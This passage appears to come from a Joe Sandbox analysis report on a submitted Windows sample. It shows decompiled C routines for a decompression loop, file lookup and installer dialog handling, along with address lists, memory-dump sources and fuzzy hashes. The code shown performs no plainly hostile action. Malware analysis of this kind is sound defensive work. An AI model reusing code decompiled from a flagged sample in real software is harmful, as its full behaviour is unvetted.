                                                                        								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                        								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                                        								__eflags =  *(__ebp - 0x30);
                                                                        								 *( *(__ebp - 0x68)) = __cl;
                                                                        								 *(__ebp - 0x14) = __edx;
                                                                        								if( *(__ebp - 0x30) > 0) {
                                                                        									continue;
                                                                        								} else {
                                                                        									goto L80;
                                                                        								}
                                                                        							}
                                                                        							 *(__ebp - 0x88) = 0x1c;
                                                                        							goto L170;
                                                                        					}
                                                                        				}
                                                                        			}













                                                                        0x00000000
                                                                        0x00406d5f
                                                                        0x00406d5f
                                                                        0x00406d64
                                                                        0x00406ddb
                                                                        0x00406de2
                                                                        0x00406dec
                                                                        0x004073cb
                                                                        0x004073cb
                                                                        0x004073ce
                                                                        0x004073ce
                                                                        0x004073d4
                                                                        0x004073da
                                                                        0x004073e0
                                                                        0x004073fa
                                                                        0x004073fd
                                                                        0x00407403
                                                                        0x0040740e
                                                                        0x00407410
                                                                        0x004073e2
                                                                        0x004073e2
                                                                        0x004073f1
                                                                        0x004073f5
                                                                        0x004073f5
                                                                        0x0040741a
                                                                        0x00407441
                                                                        0x00407441
                                                                        0x00407447
                                                                        0x00407447
                                                                        0x00000000
                                                                        0x0040741c
                                                                        0x0040741c
                                                                        0x00407420
                                                                        0x004075cf
                                                                        0x00000000
                                                                        0x004075cf
                                                                        0x0040742c
                                                                        0x00407433
                                                                        0x0040743b
                                                                        0x0040743e
                                                                        0x00000000
                                                                        0x0040743e
                                                                        0x00406d66
                                                                        0x00406d66
                                                                        0x00406d6a
                                                                        0x00406d72
                                                                        0x00406d75
                                                                        0x00406d77
                                                                        0x00406d7a
                                                                        0x00406d7c
                                                                        0x00406d81
                                                                        0x00406d84
                                                                        0x00406d8b
                                                                        0x00406d92
                                                                        0x00406d95
                                                                        0x00406da0
                                                                        0x00406da8
                                                                        0x00406da8
                                                                        0x00406da2
                                                                        0x00406da2
                                                                        0x00406da2
                                                                        0x00406d97
                                                                        0x00406d97
                                                                        0x00406d97
                                                                        0x00406daf
                                                                        0x00406dcd
                                                                        0x00406dcf
                                                                        0x00406fa2
                                                                        0x00406fa2
                                                                        0x00406fa5
                                                                        0x00406fa8
                                                                        0x00406fab
                                                                        0x00406fae
                                                                        0x00406fb1
                                                                        0x00406fb4
                                                                        0x00406fb7
                                                                        0x00406fba
                                                                        0x00406fc0
                                                                        0x00406fd8
                                                                        0x00406fdb
                                                                        0x00406fde
                                                                        0x00406fe1
                                                                        0x00406fe1
                                                                        0x00406fe4
                                                                        0x00406fea
                                                                        0x00406fc2
                                                                        0x00406fc2
                                                                        0x00406fca
                                                                        0x00406fcf
                                                                        0x00406fd1
                                                                        0x00406fd3
                                                                        0x00406fd3
                                                                        0x00406ff4
                                                                        0x00406ff7
                                                                        0x00406f9a
                                                                        0x00406fa0
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406ff9
                                                                        0x00406f75
                                                                        0x00406f79
                                                                        0x00407581
                                                                        0x00000000
                                                                        0x00407581
                                                                        0x00406f7f
                                                                        0x00406f82
                                                                        0x00406f85
                                                                        0x00406f89
                                                                        0x00406f8c
                                                                        0x00406f92
                                                                        0x00406f94
                                                                        0x00406f94
                                                                        0x00406f97
                                                                        0x00000000
                                                                        0x00406f97
                                                                        0x00406db1
                                                                        0x00406db1
                                                                        0x00406db4
                                                                        0x00406dba
                                                                        0x00406dbc
                                                                        0x00406dbc
                                                                        0x00406dbf
                                                                        0x00406dc2
                                                                        0x00406dc4
                                                                        0x00406dc5
                                                                        0x00406dc8
                                                                        0x00406e35
                                                                        0x00406e35
                                                                        0x00406e39
                                                                        0x00406e3c
                                                                        0x00406e3f
                                                                        0x00406e42
                                                                        0x00406e45
                                                                        0x00406e46
                                                                        0x00406e49
                                                                        0x00406e4b
                                                                        0x00406e51
                                                                        0x00406e54
                                                                        0x00406e57
                                                                        0x00406e5a
                                                                        0x00406e5d
                                                                        0x00406e63
                                                                        0x00406e7f
                                                                        0x00406e82
                                                                        0x00406e85
                                                                        0x00406e88
                                                                        0x00406e8f
                                                                        0x00406e95
                                                                        0x00406e99
                                                                        0x00406e65
                                                                        0x00406e65
                                                                        0x00406e69
                                                                        0x00406e71
                                                                        0x00406e76
                                                                        0x00406e78
                                                                        0x00406e7a
                                                                        0x00406e7a
                                                                        0x00406ea3
                                                                        0x00406ea6
                                                                        0x00406e1d
                                                                        0x00406e1d
                                                                        0x00406e23
                                                                        0x00406ed6
                                                                        0x00406edc
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406ede
                                                                        0x00406ee1
                                                                        0x00406ee4
                                                                        0x00406ee7
                                                                        0x00406eea
                                                                        0x00406eed
                                                                        0x00406ef0
                                                                        0x00406ef3
                                                                        0x00406ef6
                                                                        0x00406efc
                                                                        0x00406f14
                                                                        0x00406f17
                                                                        0x00406f1a
                                                                        0x00406f1d
                                                                        0x00406f1d
                                                                        0x00406f20
                                                                        0x00406f26
                                                                        0x00406efe
                                                                        0x00406efe
                                                                        0x00406f06
                                                                        0x00406f0b
                                                                        0x00406f0d
                                                                        0x00406f0f
                                                                        0x00406f0f
                                                                        0x00406f30
                                                                        0x00406f33
                                                                        0x00406eb1
                                                                        0x00406eb5
                                                                        0x00407575
                                                                        0x00000000
                                                                        0x00407575
                                                                        0x00406ebb
                                                                        0x00406ebe
                                                                        0x00406ec1
                                                                        0x00406ec5
                                                                        0x00406ec8
                                                                        0x00406ece
                                                                        0x00406ed0
                                                                        0x00406ed0
                                                                        0x00406ed3
                                                                        0x00406ed3
                                                                        0x00406f33
                                                                        0x00406f3a
                                                                        0x00406f3a
                                                                        0x00406f3a
                                                                        0x00406f3e
                                                                        0x00406f3e
                                                                        0x00406f41
                                                                        0x00406f44
                                                                        0x00406f48
                                                                        0x0040758d
                                                                        0x00000000
                                                                        0x0040758d
                                                                        0x00406f4e
                                                                        0x00406f51
                                                                        0x00406f54
                                                                        0x00406f57
                                                                        0x00406f5a
                                                                        0x00406f5d
                                                                        0x00406f60
                                                                        0x00406f62
                                                                        0x00406f65
                                                                        0x00406f68
                                                                        0x00406f6b
                                                                        0x00406f6d
                                                                        0x00406f6d
                                                                        0x00406f6d
                                                                        0x0040710a
                                                                        0x0040710a
                                                                        0x0040710d
                                                                        0x0040710d
                                                                        0x00000000
                                                                        0x0040710d
                                                                        0x00406e2f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406eac
                                                                        0x00406df8
                                                                        0x00406dfc
                                                                        0x00407569
                                                                        0x004075e5
                                                                        0x004075ed
                                                                        0x004075f4
                                                                        0x004075f6
                                                                        0x004075fd
                                                                        0x00407601
                                                                        0x00407601
                                                                        0x00406e02
                                                                        0x00406e05
                                                                        0x00406e08
                                                                        0x00406e0c
                                                                        0x00406e0f
                                                                        0x00406e15
                                                                        0x00406e17
                                                                        0x00406e17
                                                                        0x00406e1a
                                                                        0x00000000
                                                                        0x00406e1a
                                                                        0x00406ea6
                                                                        0x00406daf
                                                                        0x00406be3
                                                                        0x00406be3
                                                                        0x00406bec
                                                                        0x004075fa
                                                                        0x004075fa
                                                                        0x00000000
                                                                        0x004075fa
                                                                        0x00406bf2
                                                                        0x00000000
                                                                        0x00406bfd
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406c06
                                                                        0x00406c09
                                                                        0x00406c0c
                                                                        0x00406c10
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406c16
                                                                        0x00406c19
                                                                        0x00406c1b
                                                                        0x00406c1c
                                                                        0x00406c1f
                                                                        0x00406c21
                                                                        0x00406c22
                                                                        0x00406c24
                                                                        0x00406c27
                                                                        0x00406c2c
                                                                        0x00406c31
                                                                        0x00406c3a
                                                                        0x00406c4d
                                                                        0x00406c50
                                                                        0x00406c5c
                                                                        0x00406c84
                                                                        0x00406c86
                                                                        0x00406c94
                                                                        0x00406c94
                                                                        0x00406c98
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406c88
                                                                        0x00406c88
                                                                        0x00406c8b
                                                                        0x00406c8c
                                                                        0x00406c8c
                                                                        0x00000000
                                                                        0x00406c88
                                                                        0x00406c62
                                                                        0x00406c67
                                                                        0x00406c67
                                                                        0x00406c70
                                                                        0x00406c78
                                                                        0x00406c7b
                                                                        0x00000000
                                                                        0x00406c81
                                                                        0x00406c81
                                                                        0x00000000
                                                                        0x00406c81
                                                                        0x00000000
                                                                        0x00406c9e
                                                                        0x00406c9e
                                                                        0x00406ca2
                                                                        0x0040754e
                                                                        0x00000000
                                                                        0x0040754e
                                                                        0x00406cab
                                                                        0x00406cbb
                                                                        0x00406cbe
                                                                        0x00406cc1
                                                                        0x00406cc1
                                                                        0x00406cc1
                                                                        0x00406cc4
                                                                        0x00406cc8
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406cca
                                                                        0x00406cd0
                                                                        0x00406cfa
                                                                        0x00406d00
                                                                        0x00406d07
                                                                        0x00000000
                                                                        0x00406d07
                                                                        0x00406cd6
                                                                        0x00406cd9
                                                                        0x00406cde
                                                                        0x00406cde
                                                                        0x00406ce9
                                                                        0x00406cf1
                                                                        0x00406cf4
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406d39
                                                                        0x00406d3f
                                                                        0x00406d42
                                                                        0x00406d4f
                                                                        0x00406d57
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406d0e
                                                                        0x00406d0e
                                                                        0x00406d12
                                                                        0x0040755d
                                                                        0x00000000
                                                                        0x0040755d
                                                                        0x00406d1e
                                                                        0x00406d29
                                                                        0x00406d29
                                                                        0x00406d29
                                                                        0x00406d2c
                                                                        0x00406d2f
                                                                        0x00406d32
                                                                        0x00406d37
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406ffe
                                                                        0x00407002
                                                                        0x00407020
                                                                        0x00407023
                                                                        0x0040702a
                                                                        0x0040702d
                                                                        0x00407030
                                                                        0x00407033
                                                                        0x00407036
                                                                        0x00407039
                                                                        0x0040703b
                                                                        0x00407042
                                                                        0x00407043
                                                                        0x00407045
                                                                        0x00407048
                                                                        0x0040704b
                                                                        0x0040704e
                                                                        0x0040704e
                                                                        0x00407053
                                                                        0x00000000
                                                                        0x00407053
                                                                        0x00407004
                                                                        0x00407007
                                                                        0x0040700a
                                                                        0x00407014
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00407068
                                                                        0x0040706c
                                                                        0x0040708f
                                                                        0x00407092
                                                                        0x00407095
                                                                        0x0040709f
                                                                        0x0040706e
                                                                        0x0040706e
                                                                        0x00407071
                                                                        0x00407074
                                                                        0x00407077
                                                                        0x00407084
                                                                        0x00407087
                                                                        0x00407087
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004070ab
                                                                        0x004070af
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004070b5
                                                                        0x004070b9
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004070bf
                                                                        0x004070c1
                                                                        0x004070c5
                                                                        0x004070c5
                                                                        0x004070c8
                                                                        0x004070cc
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040711c
                                                                        0x00407120
                                                                        0x00407127
                                                                        0x0040712a
                                                                        0x0040712d
                                                                        0x00407137
                                                                        0x00000000
                                                                        0x00407137
                                                                        0x00407122
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00407143
                                                                        0x00407147
                                                                        0x0040714e
                                                                        0x00407151
                                                                        0x00407154
                                                                        0x00407149
                                                                        0x00407149
                                                                        0x00407149
                                                                        0x00407157
                                                                        0x0040715a
                                                                        0x0040715d
                                                                        0x0040715d
                                                                        0x00407160
                                                                        0x00407163
                                                                        0x00407166
                                                                        0x00407166
                                                                        0x00407169
                                                                        0x00407170
                                                                        0x00407175
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00407203
                                                                        0x00407203
                                                                        0x00407207
                                                                        0x004075a5
                                                                        0x00000000
                                                                        0x004075a5
                                                                        0x0040720d
                                                                        0x00407210
                                                                        0x00407213
                                                                        0x00407217
                                                                        0x0040721a
                                                                        0x00407220
                                                                        0x00407222
                                                                        0x00407222
                                                                        0x00407222
                                                                        0x00407225
                                                                        0x00407228
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00407286
                                                                        0x00407286
                                                                        0x0040728a
                                                                        0x004075b1
                                                                        0x00000000
                                                                        0x004075b1
                                                                        0x00407290
                                                                        0x00407293
                                                                        0x00407296
                                                                        0x0040729a
                                                                        0x0040729d
                                                                        0x004072a3
                                                                        0x004072a5
                                                                        0x004072a5
                                                                        0x004072a5
                                                                        0x004072a8
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00407056
                                                                        0x00407056
                                                                        0x00407059
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00407395
                                                                        0x00407399
                                                                        0x004073bb
                                                                        0x004073be
                                                                        0x004073c8
                                                                        0x00000000
                                                                        0x004073c8
                                                                        0x0040739b
                                                                        0x0040739e
                                                                        0x004073a2
                                                                        0x004073a5
                                                                        0x004073a5
                                                                        0x004073a8
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00407452
                                                                        0x00407456
                                                                        0x00407474
                                                                        0x00407474
                                                                        0x00407474
                                                                        0x0040747b
                                                                        0x00407482
                                                                        0x00407489
                                                                        0x00407489
                                                                        0x00000000
                                                                        0x00407489
                                                                        0x00407458
                                                                        0x0040745b
                                                                        0x0040745e
                                                                        0x00407461
                                                                        0x00407468
                                                                        0x004073ac
                                                                        0x004073ac
                                                                        0x004073af
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00407543
                                                                        0x00407546
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040717d
                                                                        0x0040717f
                                                                        0x00407186
                                                                        0x00407187
                                                                        0x00407189
                                                                        0x0040718c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00407194
                                                                        0x00407197
                                                                        0x0040719a
                                                                        0x0040719c
                                                                        0x0040719e
                                                                        0x0040719e
                                                                        0x0040719f
                                                                        0x004071a2
                                                                        0x004071a9
                                                                        0x004071ac
                                                                        0x004071ba
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00407490
                                                                        0x00407490
                                                                        0x00407493
                                                                        0x0040749a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040749f
                                                                        0x0040749f
                                                                        0x004074a3
                                                                        0x004075db
                                                                        0x00000000
                                                                        0x004075db
                                                                        0x004074a9
                                                                        0x004074ac
                                                                        0x004074af
                                                                        0x004074b3
                                                                        0x004074b6
                                                                        0x004074bc
                                                                        0x004074be
                                                                        0x004074be
                                                                        0x004074be
                                                                        0x004074c1
                                                                        0x004074c4
                                                                        0x004074c4
                                                                        0x004074c4
                                                                        0x004074c4
                                                                        0x004074c7
                                                                        0x004074c7
                                                                        0x004074cb
                                                                        0x0040752b
                                                                        0x0040752e
                                                                        0x00407533
                                                                        0x00407534
                                                                        0x00407536
                                                                        0x00407538
                                                                        0x0040753b
                                                                        0x00000000
                                                                        0x0040753b
                                                                        0x004074cd
                                                                        0x004074d3
                                                                        0x004074d6
                                                                        0x004074d9
                                                                        0x004074dc
                                                                        0x004074df
                                                                        0x004074e2
                                                                        0x004074e5
                                                                        0x004074e8
                                                                        0x004074eb
                                                                        0x004074ee
                                                                        0x00407507
                                                                        0x0040750a
                                                                        0x0040750d
                                                                        0x00407510
                                                                        0x00407514
                                                                        0x00407516
                                                                        0x00407516
                                                                        0x00407517
                                                                        0x0040751a
                                                                        0x004074f0
                                                                        0x004074f0
                                                                        0x004074f8
                                                                        0x004074fd
                                                                        0x004074ff
                                                                        0x00407502
                                                                        0x00407502
                                                                        0x0040751d
                                                                        0x00407524
                                                                        0x00000000
                                                                        0x00407526
                                                                        0x00000000
                                                                        0x00407526
                                                                        0x00000000
                                                                        0x004071c2
                                                                        0x004071c5
                                                                        0x004071fb
                                                                        0x0040732b
                                                                        0x0040732b
                                                                        0x0040732b
                                                                        0x0040732b
                                                                        0x0040732e
                                                                        0x0040732e
                                                                        0x00407331
                                                                        0x00407333
                                                                        0x004075bd
                                                                        0x00000000
                                                                        0x004075bd
                                                                        0x00407339
                                                                        0x0040733c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00407342
                                                                        0x00407346
                                                                        0x00407349
                                                                        0x00407349
                                                                        0x00407349
                                                                        0x00000000
                                                                        0x00407349
                                                                        0x004071c7
                                                                        0x004071c9
                                                                        0x004071cb
                                                                        0x004071cd
                                                                        0x004071d0
                                                                        0x004071d1
                                                                        0x004071d3
                                                                        0x004071d5
                                                                        0x004071d8
                                                                        0x004071db
                                                                        0x004071f1
                                                                        0x004071f6
                                                                        0x0040722e
                                                                        0x0040722e
                                                                        0x00407232
                                                                        0x0040725e
                                                                        0x00407260
                                                                        0x00407267
                                                                        0x0040726a
                                                                        0x0040726d
                                                                        0x0040726d
                                                                        0x00407272
                                                                        0x00407272
                                                                        0x00407274
                                                                        0x00407277
                                                                        0x0040727e
                                                                        0x00407281
                                                                        0x004072ae
                                                                        0x004072ae
                                                                        0x004072b1
                                                                        0x004072b4
                                                                        0x00407328
                                                                        0x00407328
                                                                        0x00407328
                                                                        0x00000000
                                                                        0x00407328
                                                                        0x004072b6
                                                                        0x004072bc
                                                                        0x004072bf
                                                                        0x004072c2
                                                                        0x004072c5
                                                                        0x004072c8
                                                                        0x004072cb
                                                                        0x004072ce
                                                                        0x004072d1
                                                                        0x004072d4
                                                                        0x004072d7
                                                                        0x004072f0
                                                                        0x004072f2
                                                                        0x004072f5
                                                                        0x004072f6
                                                                        0x004072f9
                                                                        0x004072fb
                                                                        0x004072fe
                                                                        0x00407300
                                                                        0x00407302
                                                                        0x00407305
                                                                        0x00407307
                                                                        0x0040730a
                                                                        0x0040730e
                                                                        0x00407310
                                                                        0x00407310
                                                                        0x00407311
                                                                        0x00407314
                                                                        0x00407317
                                                                        0x004072d9
                                                                        0x004072d9
                                                                        0x004072e1
                                                                        0x004072e6
                                                                        0x004072e8
                                                                        0x004072eb
                                                                        0x004072eb
                                                                        0x0040731a
                                                                        0x00407321
                                                                        0x004072ab
                                                                        0x004072ab
                                                                        0x004072ab
                                                                        0x004072ab
                                                                        0x00000000
                                                                        0x00407323
                                                                        0x00000000
                                                                        0x00407323
                                                                        0x00407321
                                                                        0x00407234
                                                                        0x00407237
                                                                        0x00407239
                                                                        0x0040723c
                                                                        0x0040723f
                                                                        0x00407242
                                                                        0x00407244
                                                                        0x00407247
                                                                        0x0040724a
                                                                        0x0040724a
                                                                        0x0040724d
                                                                        0x0040724d
                                                                        0x00407250
                                                                        0x00407257
                                                                        0x0040722b
                                                                        0x0040722b
                                                                        0x0040722b
                                                                        0x0040722b
                                                                        0x00000000
                                                                        0x00407259
                                                                        0x00000000
                                                                        0x00407259
                                                                        0x00407257
                                                                        0x004071dd
                                                                        0x004071e0
                                                                        0x004071e2
                                                                        0x004071e5
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004070cf
                                                                        0x004070cf
                                                                        0x004070d3
                                                                        0x00407599
                                                                        0x00000000
                                                                        0x00407599
                                                                        0x004070d9
                                                                        0x004070dc
                                                                        0x004070df
                                                                        0x004070e2
                                                                        0x004070e4
                                                                        0x004070e4
                                                                        0x004070e4
                                                                        0x004070e7
                                                                        0x004070ea
                                                                        0x004070ed
                                                                        0x004070f0
                                                                        0x004070f3
                                                                        0x004070f6
                                                                        0x004070f7
                                                                        0x004070f9
                                                                        0x004070f9
                                                                        0x004070f9
                                                                        0x004070fc
                                                                        0x004070ff
                                                                        0x00407102
                                                                        0x00407105
                                                                        0x00407105
                                                                        0x00407105
                                                                        0x00407108
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040734c
                                                                        0x0040734c
                                                                        0x0040734c
                                                                        0x00407350
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00407356
                                                                        0x00407359
                                                                        0x0040735c
                                                                        0x0040735f
                                                                        0x00407361
                                                                        0x00407361
                                                                        0x00407361
                                                                        0x00407364
                                                                        0x00407367
                                                                        0x0040736a
                                                                        0x0040736d
                                                                        0x00407370
                                                                        0x00407373
                                                                        0x00407374
                                                                        0x00407376
                                                                        0x00407376
                                                                        0x00407376
                                                                        0x00407379
                                                                        0x0040737c
                                                                        0x0040737f
                                                                        0x00407382
                                                                        0x00407385
                                                                        0x00407389
                                                                        0x0040738b
                                                                        0x0040738e
                                                                        0x00000000
                                                                        0x00407390
                                                                        0x00000000
                                                                        0x00407390
                                                                        0x0040738e
                                                                        0x004075c3
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406bf2

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.882263654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.882255021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882283133.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882292421.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882342652.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882351128.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882361743.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882369815.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882380197.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
                                                                        • Instruction ID: 02c1e40b0c9780dd067322b7733c474732bd0f187a49f53fd7fd3c108ee94619
                                                                        • Opcode Fuzzy Hash: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
                                                                        • Instruction Fuzzy Hash: 7CF15570D04229CBDF28CFA8C8946ADBBB0FF44305F24816ED456BB281D7386A86DF45
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0040699E(WCHAR* _a4) {
                                                                        				void* _t2;
                                                                        
                                                                        				_t2 = FindFirstFileW(_a4, 0x426798); // executed
                                                                        				if(_t2 == 0xffffffff) {
                                                                        					return 0;
                                                                        				}
                                                                        				FindClose(_t2);
                                                                        				return 0x426798;
                                                                        			}




                                                                        0x004069a9
                                                                        0x004069b2
                                                                        0x00000000
                                                                        0x004069bf
                                                                        0x004069b5
                                                                        0x00000000

                                                                        APIs
                                                                        • FindFirstFileW.KERNELBASE(76F1FAA0,00426798,00425F50,00406088,00425F50,00425F50,00000000,00425F50,00425F50,76F1FAA0,?,76F1F560,00405D94,?,76F1FAA0,76F1F560), ref: 004069A9
                                                                        • FindClose.KERNEL32(00000000), ref: 004069B5
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.882263654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.882255021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882283133.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882292421.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882342652.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882351128.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882361743.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882369815.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882380197.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Find$CloseFileFirst
                                                                        • String ID:
                                                                        • API String ID: 2295610775-0
                                                                        • Opcode ID: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
                                                                        • Instruction ID: 0ca7534fdffec89160a31ceabb6ef5ff718bfc83d1618d69d17f9e635378cbc3
                                                                        • Opcode Fuzzy Hash: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
                                                                        • Instruction Fuzzy Hash: 5ED012B15192205FC34057387E0C84B7A989F563317268A36B4AAF11E0CB348C3297AC
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 194 4040c5-4040d7 195 4040dd-4040e3 194->195 196 40423e-40424d 194->196 195->196 199 4040e9-4040f2 195->199 197 40429c-4042b1 196->197 198 40424f-40428a GetDlgItem * 2 call 4045c4 KiUserCallbackDispatcher call 40140b 196->198 201 4042f1-4042f6 call 404610 197->201 202 4042b3-4042b6 197->202 223 40428f-404297 198->223 203 4040f4-404101 SetWindowPos 199->203 204 404107-40410e 199->204 211 4042fb-404316 201->211 208 4042b8-4042c3 call 401389 202->208 209 4042e9-4042eb 202->209 203->204 205 404110-40412a ShowWindow 204->205 206 404152-404158 204->206 212 404130-404143 GetWindowLongW 205->212 213 40422b-404239 call 40462b 205->213 214 404171-404174 206->214 215 40415a-40416c DestroyWindow 206->215 208->209 235 4042c5-4042e4 SendMessageW 208->235 209->201 218 404591 209->218 219 404318-40431a call 40140b 211->219 220 40431f-404325 211->220 212->213 221 404149-40414c ShowWindow 212->221 224 404593-40459a 213->224 225 404176-404182 SetWindowLongW 214->225 226 404187-40418d 214->226 222 40456e-404574 215->222 218->224 219->220 232 40432b-404336 220->232 233 40454f-404568 DestroyWindow EndDialog 220->233 221->206 222->218 231 404576-40457c 222->231 223->197 225->224 226->213 234 404193-4041a2 GetDlgItem 226->234 231->218 236 40457e-404587 ShowWindow 231->236 232->233 237 40433c-404389 call 4066a5 call 4045c4 * 3 GetDlgItem 232->237 233->222 238 4041c1-4041c4 234->238 239 4041a4-4041bb SendMessageW IsWindowEnabled 234->239 235->224 236->218 266 404393-4043cf ShowWindow KiUserCallbackDispatcher call 4045e6 EnableWindow 237->266 267 40438b-404390 237->267 241 4041c6-4041c7 238->241 242 4041c9-4041cc 238->242 239->218 239->238 244 4041f7-4041fc call 40459d 241->244 245 4041da-4041df 242->245 246 4041ce-4041d4 242->246 244->213 247 4041e1-4041e7 245->247 248 404215-404225 SendMessageW 245->248 246->248 251 4041d6-4041d8 246->251 252 4041e9-4041ef call 40140b 247->252 253 4041fe-404207 call 40140b 247->253 248->213 251->244 262 4041f5 252->262 253->213 263 404209-404213 253->263 262->244 263->262 270 4043d1-4043d2 266->270 271 4043d4 266->271 267->266 272 4043d6-404404 GetSystemMenu EnableMenuItem SendMessageW 270->272 271->272 273 404406-404417 SendMessageW 272->273 274 404419 272->274 275 40441f-40445e call 4045f9 call 4040a6 call 406668 lstrlenW call 4066a5 SetWindowTextW call 401389 273->275 274->275 275->211 286 404464-404466 275->286 286->211 287 40446c-404470 286->287 288 404472-404478 287->288 289 40448f-4044a3 DestroyWindow 287->289 288->218 290 40447e-404484 288->290 289->222 291 4044a9-4044d6 CreateDialogParamW 289->291 290->211 292 40448a 290->292 291->222 293 4044dc-404533 call 4045c4 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 291->293 292->218 293->218 298 404535-404548 ShowWindow call 404610 293->298 300 40454d 298->300 300->222
                                                                        C-Code - Quality: 86%
                                                                        			E004040C5(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
                                                                        				struct HWND__* _v28;
                                                                        				void* _v80;
                                                                        				void* _v84;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t34;
                                                                        				signed int _t36;
                                                                        				signed int _t38;
                                                                        				struct HWND__* _t48;
                                                                        				signed int _t67;
                                                                        				struct HWND__* _t73;
                                                                        				signed int _t86;
                                                                        				struct HWND__* _t91;
                                                                        				signed int _t99;
                                                                        				int _t103;
                                                                        				signed int _t117;
                                                                        				int _t118;
                                                                        				int _t122;
                                                                        				signed int _t124;
                                                                        				struct HWND__* _t127;
                                                                        				struct HWND__* _t128;
                                                                        				int _t129;
                                                                        				intOrPtr _t130;
                                                                        				long _t133;
                                                                        				int _t135;
                                                                        				int _t136;
                                                                        				void* _t137;
                                                                        
                                                                        				_t130 = _a8;
                                                                        				if(_t130 == 0x110 || _t130 == 0x408) {
                                                                        					_t34 = _a12;
                                                                        					_t127 = _a4;
                                                                        					__eflags = _t130 - 0x110;
                                                                        					 *0x423730 = _t34;
                                                                        					if(_t130 == 0x110) {
                                                                        						 *0x42a268 = _t127;
